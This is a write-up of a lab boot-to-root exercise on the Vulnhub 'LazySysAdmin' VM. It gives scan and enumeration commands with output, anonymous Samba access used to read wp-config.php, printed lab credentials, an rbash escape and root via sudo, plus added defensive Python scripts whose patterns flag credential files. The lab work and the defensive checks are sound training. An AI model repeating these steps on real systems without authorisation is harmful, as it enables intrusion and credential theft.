Vulnhub: LazySysAdmin Boot2Root VM

Introduction

For my second Boot2Root write-up I’ll document the process I followed to fully compromise the “LazySysAdmin” VM, created by Togie Mcdogie and hosted on Vulnhub.

The aim of this VM is to go from a remote, unauthenticated user to root-level access on the machine. Mr Mcdogie says on Vulnhub “Enumeration is key” under the hints section, and he wasn’t joking!

Let’s go.

 

Recon

I’ll skip the host discovery phase as it’s reasonably straightforward (simply a case of running netdiscover and making a cup of tea while it checked for live hosts in my subnet).


root@kali:~# nmap -sV -T5 -p- -e eth1 192.168.56.103
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 192.168.56.103
Not shown: 65529 closed ports

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:EC:86:3F (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

The nmap service scan informs us that the above services are running. The interesting ones here are Apache, InspIRCd and Samba.

Enumeration

Vulnhub advised us that enumeration was key with this box, so we’ll start by enumerating Apache.

Apache

First up we’ll run dirb to get an idea of the directories available on the site:

dirb http://192.168.56.103

---- Scanning URL: http://192.168.56.103/ ----

==> DIRECTORY: http://192.168.56.103/apache/  
+ http://192.168.56.103/index.html (CODE:200|SIZE:36072)            
+ http://192.168.56.103/info.php (CODE:200|SIZE:77268)   
==> DIRECTORY: http://192.168.56.103/javascript/         
==> DIRECTORY: http://192.168.56.103/old/         
==> DIRECTORY: http://192.168.56.103/phpmyadmin/     
+ http://192.168.56.103/robots.txt (CODE:200|SIZE:92)  
+ http://192.168.56.103/server-status (CODE:403|SIZE:294)     
==> DIRECTORY: http://192.168.56.103/test/              
==> DIRECTORY: http://192.168.56.103/wordpress/       
==> DIRECTORY: http://192.168.56.103/wp/   

 

As we can see, there are numerous interesting subdirectories here with wordpress and phpmyadmin being of particular interest.

A quick curl of info.php reveals that it is just printing <?php phpinfo() ?> behind the scenes, which is useful for gathering more information about the web server installation.

Next up we’ll see if there’s anything juicy in robots.txt (an old-school way of finding interesting directories, but it still yields results occasionally):

root@kali:~/samba# curl 192.168.56.103/robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/


Upon further inspection none of these directories are of interest: /old, /test and /TR2 are all broken, and /Backnode_files is just an indexable directory full of static content. Meh.

 

WordPress

dirb told us that there was a WordPress installation available, so we’ll use the excellent wpscan tool to establish whether there are any interesting misconfigurations in the installation:

root@kali:~/samba# wpscan --url http://192.168.56.103/wordpress

.....................SNIP.....................
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.56.103/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.56.103/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.56.103/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.56.103/wordpress/wp-includes/

[!] 7 vulnerabilities identified from the version number

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
[i] Fixed in: 4.8.2

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer 
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
 
.....................SNIP.....................

 

So lots of information was disclosed (server type and version, PHP version), and there appear to be numerous vulnerabilities associated with this particular version of WordPress. If we run out of things to enumerate, we at least have options here for potential ‘ins’.
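The wpscan output above pairs each advisory with a version range and (usually) a “Fixed in” version. For a defender the useful questions are which of those advisories still apply to a given installed version and which upgrade target clears them. The script below is an added example written for this write-up; it is not wpscan output and not code from the WPScan project. It parses the “[!] Title: WordPress <low>-<high> - <name>” and “[i] Fixed in: <version>” lines exactly as they appear above, and the assumption that the quoted ranges are inclusive is mine.

```python
"""Match wpscan advisory lines against an installed WordPress version.

Added example, not part of the original write-up or of WPScan. The line
format and the inclusive interpretation of "low-high" ranges are assumptions
taken from the output quoted on this page.
"""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]

TITLE_RE = re.compile(r"^\[!\] Title: WordPress (\S+)-(\S+) - (.+)$")
FIXED_RE = re.compile(r"^\[i\] Fixed in: (\S+)$")

# Excerpt of the wpscan findings quoted in the write-up (kept verbatim).
SAMPLE_WPSCAN = """\
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer 
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
"""


def parse_version(text: str) -> Version:
    """'4.8.1' -> (4, 8, 1); components are compared numerically, not as strings."""
    return tuple(int(part) for part in text.strip().split("."))


def pad(version: Version, length: int) -> Version:
    """Right-pad with zeros so '2.3' and '2.3.0' compare equal."""
    return version + (0,) * (length - len(version))


def parse_findings(text: str) -> List[Dict]:
    """Turn Title/Fixed-in line pairs into dicts; fixed_in stays None when absent."""
    findings: List[Dict] = []
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        match = TITLE_RE.match(line)
        if match:
            current = {
                "low": parse_version(match.group(1)),
                "high": parse_version(match.group(2)),
                "title": match.group(3).strip(),
                "fixed_in": None,
            }
            findings.append(current)
            continue
        match = FIXED_RE.match(line)
        if match and current is not None:
            current["fixed_in"] = parse_version(match.group(1))
    return findings


def affects(finding: Dict, installed: Version) -> bool:
    """True if installed lies inside the advisory's inclusive version range."""
    width = max(len(finding["low"]), len(finding["high"]), len(installed))
    return pad(finding["low"], width) <= pad(installed, width) <= pad(finding["high"], width)


def applicable_titles(text: str, installed: str) -> List[str]:
    """Advisory titles that still apply to the given installed version."""
    version = parse_version(installed)
    return [f["title"] for f in parse_findings(text) if affects(f, version)]


def minimum_fixed_version(text: str) -> Optional[Version]:
    """Highest 'Fixed in' version seen; upgrading to it clears every fixed advisory."""
    fixed = [f["fixed_in"] for f in parse_findings(text) if f["fixed_in"]]
    return max(fixed) if fixed else None


if __name__ == "__main__":
    for candidate in ("4.8.1", "4.8.2", "4.8.3"):
        print(candidate, "->", applicable_titles(SAMPLE_WPSCAN, candidate))
    print("upgrade target:", ".".join(map(str, minimum_fixed_version(SAMPLE_WPSCAN))))
```

Note that the last advisory in the excerpt has no “Fixed in” line, so it still applies at 4.8.2; the parser keeps `fixed_in` as None rather than guessing a version.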

A quick poke around the wordpress instance using our web browser highlights a few nuggets of information –

Key info here is that the admin username is “Admin”, they like yogibear, and the word “togie” is relevant somehow. Knowing this LazySysAdmin, that’s probably a username on the box, eh?

PhpMyAdmin

A quick poke around the PhpMyAdmin install reveals that it’s (at first glance) secure. Empty logins are disallowed and the usual suspects (root:password, root:root, admin:password……….) are all blocked. Hrm..

Samba

We decide to change tack at this point and take a look at what’s occurring with the Samba installation. Samba is a common source of misconfiguration and quite often reveals far more than it should.

First up we run enum4linux to get some basic data from Samba (domains, shares, users, permissions):

enum4linux 192.168.56.103

 

This provides us with tonnes of information, but the key parts are highlighted below:

1) Domain name is WORKGROUP and Samba is allowing anonymous logins.

 

2) The names of the shares which anonymous users can access.

3) A username on the target system (our old friend Togie).

Armed with all of this information we could go a couple of different ways. We could either brute-force togie’s password using acccheck or hydra, or we could enumerate those shares using either smbmap or smbclient.

We choose smbmap because I’ve never used it before and I want to learn 🙂

Edit: For future reference, the following command could have been used to the same ultimate effect – smbclient \\LAZYSYSADMIN\share$

/usr/share/smbmap/smbmap.py -u '' -p ''  -H 192.168.56.103 -d WORKGROUP

[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.56.103...
[+] IP: 192.168.56.103:445 Name: 192.168.56.103                                    

Disk                                                   Permissions
----                                                   -----------

print$                                             NO ACCESS
share$                                             READ ONLY
IPC$                                               NO ACCESS

 

Sounds like share$ is the one we’re interested in.

A few interesting things jump out at us here: deets.txt and todolist.txt. We’ll come back to these in a second.

More enumeration using smbmap shows us that the wordpress/ directory is readable and most importantly so is wp-config.php which means that we can get the database passwords. Result.

Using smbmap’s -A option we pull all PHP files out of the application for later perusal –

root@kali:~/samba# /usr/share/smbmap/smbmap.py -u '' -p ''  -H 192.168.56.103 -d WORKGROUP -r share$/wordpress -A 'php'

<..................SNIP..................>
[+] Match found! Downloading: share$wordpresswp-config.php

fr--r--r--             3703 Mon Aug 21 10:25:14 2017 wp-config.php

<..................SNIP..................>


Catting wp-config.php gives us some very juicy info –

 

Database, database user and password. Pretty decent password actually!
In the interest of saving some time I’ll summarise this finding as follows:
  1. Admin:TogieMYSQL12345^^ is a valid login for PhpMyAdmin and WordPress, so at this point you have database-level control.
  2. root:TogieMYSQL12345 is a valid PMA login (note the absence of ^^ on the end of the password); not sure if this is an easter egg or not.
  3. Neither of these things can be leveraged to get us a shell…
And so we move on to checking deets.txt, which we found earlier whilst enumerating Samba.

root@kali:~/samba# curl 192.168.56.103/deets.txt

CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 
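Both of the files that mattered on this box (wp-config.php with the database credentials and deets.txt with a plaintext password note) were sitting in an anonymously readable share. The script below is an added example for this write-up, not something the original author ran and not part of smbmap or Samba: it audits a directory tree that is about to be (or already is) exported as a share and flags files that should never be world-readable, by sensitive filename and by credential-looking content. The sample tree is constructed inline with placeholder values so the script runs offline; the file names mirror the ones on this box, but the contents are mine.

```python
"""Audit a directory exported as a guest-readable share for secret-bearing files.

Added example, not from the original write-up or from Samba/smbmap. The
sample tree is constructed here with PLACEHOLDER values; only the file
names (wp-config.php, deets.txt, todolist.txt) echo the box.
"""
import os
import re
import tempfile
from typing import List, Optional, Tuple

# File names that are almost always sensitive when they appear on a share.
SENSITIVE_NAMES = {"wp-config.php", ".htpasswd", "id_rsa", ".env"}

# Content patterns: credentials defined in code, or noted down in plain text.
SENSITIVE_CONTENT = [
    re.compile(r"define\(\s*['\"]DB_PASSWORD['\"]", re.IGNORECASE),
    re.compile(r"\bpassword\b", re.IGNORECASE),
]


def classify(path: str, data: str) -> Optional[str]:
    """Return a short reason if the file looks sensitive, otherwise None."""
    if os.path.basename(path) in SENSITIVE_NAMES:
        return "sensitive filename"
    for pattern in SENSITIVE_CONTENT:
        if pattern.search(data):
            return "content matches /" + pattern.pattern + "/"
    return None


def find_exposed_secrets(root: str) -> List[Tuple[str, str]]:
    """Walk root and return sorted (relative_path, reason) pairs for every hit.

    Files that are not valid UTF-8 text are skipped: the credentials this
    check is after live in config files and notes, not binaries.
    """
    hits: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            try:
                with open(full, encoding="utf-8") as fh:
                    data = fh.read()
            except (UnicodeDecodeError, OSError):
                continue
            reason = classify(full, data)
            if reason:
                hits.append((os.path.relpath(full, root), reason))
    return sorted(hits)


def build_sample_share() -> str:
    """Create a constructed stand-in for the share$ export and return its path."""
    root = tempfile.mkdtemp(prefix="share_audit_")
    os.makedirs(os.path.join(root, "wordpress"))
    files = {
        # Constructed placeholders, not the real values from the box.
        "wordpress/wp-config.php": "<?php\ndefine('DB_PASSWORD', 'PLACEHOLDER');\n",
        "wordpress/index.php": "<?php require 'wp-blog-header.php';\n",
        "deets.txt": "CBF remembering all these passwords. Password PLACEHOLDER\n",
        "todolist.txt": "Buy milk\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    share_root = build_sample_share()
    for rel, why in find_exposed_secrets(share_root):
        print(f"{rel}: {why}")
```

Run against a real export root (instead of the constructed one) the same function gives a list a sysadmin can act on before the share is published; the filename check fires first so a credential file is reported even when its content is obfuscated.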

On a whim I tried to ssh to togie@192.168.56.103 using password ‘12345’ and…

Endgame

Successfully SSH’d to the box as user togie now. Running the usual checks shows nothing interesting in his home directory, but does highlight the fact that the user is inside a restricted shell –

togie@LazySysAdmin:~$ ls /home
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

 

The restricted shell (rbash) means that this user can’t execute any command containing a forward slash. Executing bash escapes the restricted shell and gives us an unrestricted one.

togie@LazySysAdmin:~$ bash
togie@LazySysAdmin:~$ ls /home
togie

 

Sorted 🙂 Let’s see what togie can run with sudo..

 

togie@LazySysAdmin:~$ sudo -l

[sudo] password for togie: 

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


User togie may run the following commands on LazySysAdmin:

    (ALL : ALL) ALL

 

Uhh…. Game over then, as togie can run any command as root.
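The “(ALL : ALL) ALL” grant shown by sudo -l is the kind of line a sudoers review should catch before a box ships. The script below is an added example for this write-up, not code from the original author or from the sudo project: it parses sudoers-style user specifications from a constructed sample (the togie line mirrors the grant above; the other users are illustrative) and reports anyone who can run any command as any user, plus any NOPASSWD grants. The grammar it accepts is a simplified subset of sudoers syntax, which is an assumption noted in the code.

```python
"""Flag over-broad grants in sudoers-style text.

Added example, not part of the original write-up or of sudo. It understands
the common "user host=(runas[:group]) [TAG:] commands" form only; aliases,
includes and grants that omit the (runas) part are not parsed (assumption).
"""
import re
from typing import Dict, List, Tuple

GRANT_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"   # user  host=
    r"\((?P<runas>[^)]*)\)\s*"                 # (runas_user[:runas_group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"               # optional TAG: prefixes
    r"(?P<cmds>.+)$"                           # comma-separated commands
)

# Constructed sample. The togie line mirrors the `(ALL : ALL) ALL` grant
# reported by `sudo -l` on this box; the other entries are illustrative.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
togie   ALL=(ALL : ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(root) /usr/sbin/service apache2 reload
"""


def parse_grants(text: str) -> List[Dict]:
    """Return one dict per parsable user specification, in file order."""
    grants: List[Dict] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults"):
            continue
        match = GRANT_RE.match(line)
        if not match:
            continue                             # outside the supported subset
        runas_user = match.group("runas").split(":")[0].strip()
        grants.append({
            "user": match.group("user"),
            "host": match.group("host"),
            "runas_user": runas_user,
            "nopasswd": "NOPASSWD:" in match.group("tags"),
            "cmds": [c.strip() for c in match.group("cmds").split(",")],
        })
    return grants


def find_unrestricted(text: str) -> List[Tuple[str, str]]:
    """Return (user, finding) pairs a reviewer should question."""
    findings: List[Tuple[str, str]] = []
    for grant in parse_grants(text):
        if grant["user"] == "root":
            continue                             # root already has everything
        if grant["runas_user"] == "ALL" and "ALL" in grant["cmds"]:
            findings.append((grant["user"], "can run any command as any user"))
        if grant["nopasswd"]:
            findings.append((grant["user"],
                             "passwordless sudo for " + ", ".join(grant["cmds"])))
    return findings


if __name__ == "__main__":
    for user, finding in find_unrestricted(SAMPLE_SUDOERS):
        print(f"{user}: {finding}")
```

On this box the togie line alone turns a leaked low-privilege password into root, which is why the check treats a full ALL grant to a non-root account as a finding regardless of whether a password is still required.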

Conclusion

I really, really enjoyed this box. There were a few really unique and realistic touches –
  • No pre-canned vulnerabilities
  • Simple misconfigured security led to total compromise
  • Interesting twist with the restricted shell
Many thanks to Togie Mcdogie for creating this VM, it was great 🙂
